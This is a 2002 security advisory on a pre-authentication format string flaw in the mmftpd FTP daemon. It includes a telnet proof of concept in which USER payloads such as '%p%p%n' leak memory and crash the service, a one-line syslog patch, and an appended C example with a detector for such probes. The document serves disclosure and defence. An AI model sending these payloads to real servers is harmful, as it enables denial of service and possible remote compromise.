________________________________________________________________________

                      SECURITY ADVISORY INTEXXIA(c)

                               04 06 2002
                            ID #1053-040602
________________________________________________________________________

TITLE   : mmftpd FTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA
________________________________________________________________________

SYSTEM AFFECTED
===============

mmftpd <= 0.0.7
________________________________________________________________________

DESCRIPTION
===========

"mmftpd is a secure FTP server that runs as a normal user, and supports
virtual users only. Each user may have specific permissions, including the
maximum home directory size limit and download/upload speeds. It runs on
both BSD and Linux systems, and is ideal for a setup with many Web virtual
host customers. It was written from scratch, with no borrowed code."

The intexxia laboratory found a remotely exploitable format string
vulnerability in the mmftpd FTP daemon.
________________________________________________________________________

DETAILS
=======

There is a format string vulnerability in the 'mmsyslog()' function of the
'mmftpd' program. This function acts like 'vsyslog()' if '__GLIBC__' is
defined: it renders the caller's message into a buffer and then passes that
buffer, which contains the client-supplied user name, as the format string
argument of 'syslog(3)'. A remote user therefore controls a format string
consumed by 'syslog(3)'. It is not necessary to authenticate to exploit
this vulnerability.

Successful exploitation of this flaw can allow a remote user to obtain a
local account on the target machine.
________________________________________________________________________

PROOF OF CONCEPT
================

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p
331 Password required for this user
PASS foo
530 Invalid login

In the log file :

mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p%n
331 Password required for this user
PASS foo
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused
________________________________________________________________________

SOLUTION
========

The following patch corrects this issue :

diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
--- mmftpd-0.0.7/mmlib/mmlog.c	Mon May 13 08:20:13 2002
+++ mmftpd-0.0.7.fixed/mmlib/mmlog.c	Tue Jun  4 11:25:03 2002
@@ -70,7 +70,7 @@
     va_start(lst, fmt);
     vsnprintf(buf, 1023, fmt, lst);
     va_end(lst);
 
-    syslog(LOG_NOTICE, buf);
+    syslog(LOG_NOTICE, "%s", buf);
 }
 }

A new version including this patch is available at the following URL :

http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz
________________________________________________________________________

VENDOR STATUS
=============

04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew was very responsive and confirmed the vulnerability.
             He released a new version.
________________________________________________________________________

LEGALS
======

mmftpd is a registered trademark.

Intexxia provides this information as a public service and "as is".
Intexxia will not be held accountable for any damage or distress caused by
the proper or improper usage of these materials.

(c) intexxia 2002. This document is property of intexxia. Feel free to use
and distribute this material as long as credit is given to intexxia and the
author.
________________________________________________________________________

CONTACT
=======

CERT intexxia                      cert@intexxia.com
INTEXXIA                           http://www.intexxia.com
171, av. Georges Clemenceau        Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France      Fax      : +33 1 55 69 78 80
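Review bot: the one-line change in the hunk is the right fix. Before it, `buf` (already rendered by `vsnprintf()` from the caller's format and arguments, so it carries whatever the client sent as its user name) was handed to `syslog()` as the format argument, which is exactly what let the `%p%p` and `%n` in the proof of concept be interpreted; `syslog(LOG_NOTICE, "%s", buf);` turns it back into plain data. One small point on the unchanged context line `vsnprintf(buf, 1023, fmt, lst);`: the hard-coded 1023 depends on the declaration of `buf`, which is outside the hunk; `sizeof(buf) - 1` (or simply `sizeof(buf)`, since `vsnprintf` always NUL-terminates) would keep the two in step if the buffer size is ever changed. It is also worth checking that no other caller in the tree passes a client-controlled string as `fmt` itself, since this patch only protects the `syslog()` call.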
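As an added illustration of the DETAILS and SOLUTION sections (written for this page; it is not mmftpd's code and not part of the original advisory), the C program below mirrors the shape of the patched mmsyslog() and adds a small defender-side check: once the fix is in place, a probing user name such as %p%p%n is written to the log verbatim, so counting printf conversions in the logged user name of a failed-login entry is a cheap way to spot such probes. The function names, the last_line copy kept for checking without a syslog daemon, and the sample user name are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Constructed example, not mmftpd's code. last_line keeps a copy of the
 * last message so the behaviour can be checked without a syslog daemon. */
static char last_line[1024];

/* Same shape as the patched mmsyslog(): render the program's own format
 * string into buf, then hand buf to syslog(3) strictly as data ("%s"). */
void mmsyslog_fixed(const char *fmt, ...)
{
    char buf[1024];
    va_list lst;
    va_start(lst, fmt);
    vsnprintf(buf, sizeof(buf), fmt, lst);   /* fmt is a literal, args are data */
    va_end(lst);
    syslog(LOG_NOTICE, "%s", buf);           /* the one-line fix from the advisory */
    snprintf(last_line, sizeof(last_line), "%s", buf);
}

/* Defender-side check: count printf conversions in a client-supplied field
 * such as the USER name of a failed-login entry. With the fix in place the
 * name is logged verbatim, so "%p%p%n" surviving into the log is a probe. */
int count_format_specifiers(const char *s)
{
    int n = 0;
    while (*s) {
        if (*s++ != '%') continue;
        if (*s == '%') { s++; continue; }    /* "%%" is a literal percent sign */
        s += strspn(s, "-+ #0123456789.*hlLqjzt");   /* flags, width, length */
        if (*s && strchr("diouxXeEfgGaAcspn", *s)) { n++; s++; }
    }
    return n;
}

int main(void)
{
    const char *user = "%p%p%n";             /* constructed probe, as in the PoC */
    openlog("mmftpd-example", LOG_PID, LOG_DAEMON);
    mmsyslog_fixed("Failed login for %s (unexisting)", user);
    closelog();
    printf("logged : %s\n", last_line);
    printf("probe  : %d conversion(s) in user name\n", count_format_specifiers(user));
    return 0;
}
```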